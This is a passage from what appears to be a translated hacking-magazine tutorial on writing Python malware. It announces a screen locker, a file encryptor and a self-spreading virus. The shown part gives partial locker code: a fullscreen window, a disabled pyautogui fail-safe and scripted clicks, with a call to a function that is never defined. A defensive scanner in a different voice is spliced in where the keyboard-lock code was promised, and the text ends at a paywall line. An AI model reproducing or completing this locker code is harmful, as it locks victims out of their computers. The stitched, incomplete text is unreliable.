Why would anyone think of writing malware in Python? We do it here to study the general principles of malware engineering; along the way you will get practice with the language that you can apply elsewhere. Besides, Python malware still turns up in the wild, and not every antivirus pays attention to it.
Most often, Python is used to build backdoors that download and execute arbitrary code on an infected machine. In 2017, Dr.Web analysts discovered Python.BackDoor.33, and on May 8, 2019, Mac.BackDoor.Siggen.20 was spotted. Another trojan, RAT Python, stole user data from infected devices and used Telegram as its data transmission channel.
We will create three demo programs: a locker that blocks access to the computer until the user enters the correct password, an encryptor that walks directories and encrypts every file it finds, and a virus that spreads by injecting its code into other Python programs.
Remote administration of infected machines is beyond the scope of this article, but you can find the basis for that code, with full explanations, in the article “Reverse shell in Python”.
Although our creations do not claim any great technical sophistication, they can be dangerous under certain conditions. So I warn you: disrupting other people's computers and destroying information can carry severe penalties. Let's agree right away that you will run everything described here only on your own machine, and even then carefully, so that you do not accidentally encrypt your entire drive.
All information is provided for informational purposes only. Neither the author nor the editors are responsible for any possible harm caused by the materials in this article.
First of all, of course, we need Python itself, version 3. I will not describe the installation in detail; instead I refer you to the free book “Python Bite” (PDF), where you will find the answer to this and many other Python questions.
Additionally, install the modules we will use:

```shell
pip install pyAesCrypt
pip install pyautogui
# tkinter ships with the standard Python installer; on some Linux distributions
# it is a separate system package (e.g. python3-tk) rather than a pip module
pip install tkinter
```

This is the end of the preparatory phase; you can start writing code.
The idea is to create a window in full screen and prevent the user from closing it.
```python
import pyautogui
from tkinter import Tk, Entry, Label
from pyautogui import click, moveTo
from time import sleep
```
Now let's take up the main part of the program.
```python
# Create the window
root = Tk()
# Disable the fail-safe tied to the top-left corner of the screen
pyautogui.FAILSAFE = False
# Get the screen width and height
width = root.winfo_screenwidth()
height = root.winfo_screenheight()
# Set the window title
root.title('From "Xakep" with love')
# Open the window in full screen
root.attributes("-fullscreen", True)
# Create the input field and set its size and position
entry = Entry(root, font=1)
entry.place(width=150, height=50, x=width/2-75, y=height/2-25)
# Create the text labels and set their positions
label0 = Label(root, text="╚(•⌂•)╝ Locker by Xakep (╯°□°）╯︵ ┻━┻", font=1)
label0.grid(row=0, column=0)
label1 = Label(root, text="Пиши пароль и жми Ctrl + C", font='Arial 20')
label1.place(x=width/2-75-130, y=height/2-25-100)
# Refresh the window and pause briefly
root.update()
sleep(0.2)
# Click the center of the window
click(width/2, height/2)
# Reset the key
k = False
# Now keep checking whether the correct key has been entered;
# if it has, call the hooliganism function
# (on_closing() is not defined in the part of the article shown here)
while not k: on_closing()
```
pyautogui.FAILSAFE = False disables pyautogui's fail-safe, a protection that triggers when the cursor is moved to the top-left corner of the screen and then exits the program. We do not want that, so we turn it off.
So that our locker works on any monitor at any resolution, we read the screen width and height and use a simple formula to compute where the cursor will go, click, and so on. In our case the cursor lands in the center of the screen, that is, we divide the width and height by two. The pause (sleep) is added so that the user has a chance to enter the code to cancel.
So far we have not blocked text input, but you could, and then the user would not be able to get rid of us. That takes a bit more code. I do not advise doing this right away: first, let's configure the program so that it shuts down when the password is entered. The code to lock the keyboard and mouse looks like this:
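From the defender's side, the traits described above (fail-safe disabled, a fullscreen Tk window, scripted clicks) are easy to look for before running an unknown script. The following is an added example, not code from the article: an ast-based scanner that flags those traits in Python source; the trait labels and the two constructed sample scripts are my own.

```python
import ast

# Labels for the traits the article's locker combines (my own naming, not a standard)
FAILSAFE_OFF = "pyautogui_failsafe_disabled"
FULLSCREEN = "tk_fullscreen_window"
AUTOCLICK = "pyautogui_click"


def _is_attr(node, obj, attr):
    """True if `node` is the attribute access `obj.attr` on a bare name."""
    return (isinstance(node, ast.Attribute) and node.attr == attr
            and isinstance(node.value, ast.Name) and node.value.id == obj)


def scan_locker_traits(source: str) -> set:
    """Parse `source` and return the set of locker traits it exhibits."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        # pyautogui.FAILSAFE = False
        if (isinstance(node, ast.Assign)
                and any(_is_attr(t, "pyautogui", "FAILSAFE") for t in node.targets)
                and isinstance(node.value, ast.Constant) and node.value.value is False):
            found.add(FAILSAFE_OFF)
        if isinstance(node, ast.Call):
            f = node.func
            # <window>.attributes("-fullscreen", ...)
            if (isinstance(f, ast.Attribute) and f.attr == "attributes" and node.args
                    and isinstance(node.args[0], ast.Constant)
                    and node.args[0].value == "-fullscreen"):
                found.add(FULLSCREEN)
            # click(...) or pyautogui.click(...)
            if (isinstance(f, ast.Name) and f.id == "click") or _is_attr(f, "pyautogui", "click"):
                found.add(AUTOCLICK)
    return found


def looks_like_locker(source: str) -> bool:
    """The article's core combination: fail-safe disabled plus a fullscreen window."""
    traits = scan_locker_traits(source)
    return FAILSAFE_OFF in traits and FULLSCREEN in traits


# Constructed samples: a benign fullscreen kiosk and a locker-style script.
KIOSK = "from tkinter import Tk\nroot = Tk()\nroot.attributes('-fullscreen', True)\nroot.mainloop()\n"
LOCKER = ("import pyautogui\nfrom pyautogui import click\nfrom tkinter import Tk\n"
          "root = Tk()\npyautogui.FAILSAFE = False\nroot.attributes('-fullscreen', True)\n"
          "click(10, 10)\nwhile True:\n    root.update()\n")

if __name__ == "__main__":
    print("kiosk:", sorted(scan_locker_traits(KIOSK)), looks_like_locker(KIOSK))
    print("locker:", sorted(scan_locker_traits(LOCKER)), looks_like_locker(LOCKER))
```

A fullscreen window alone is not suspicious (kiosk apps do it); it is the combination with the fail-safe being switched off that the check keys on.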
Continuation is available only to participants